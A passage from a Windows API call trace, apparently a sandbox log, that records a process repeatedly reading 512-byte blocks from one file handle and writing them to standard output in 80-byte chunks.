lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 
[0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.718] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.718] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 
lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.719] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.719] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType 
(hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.720] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.720] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, 
lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.721] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.722] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: 
hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.723] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.723] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 
[0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.724] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.724] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, 
lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.725] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.725] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 
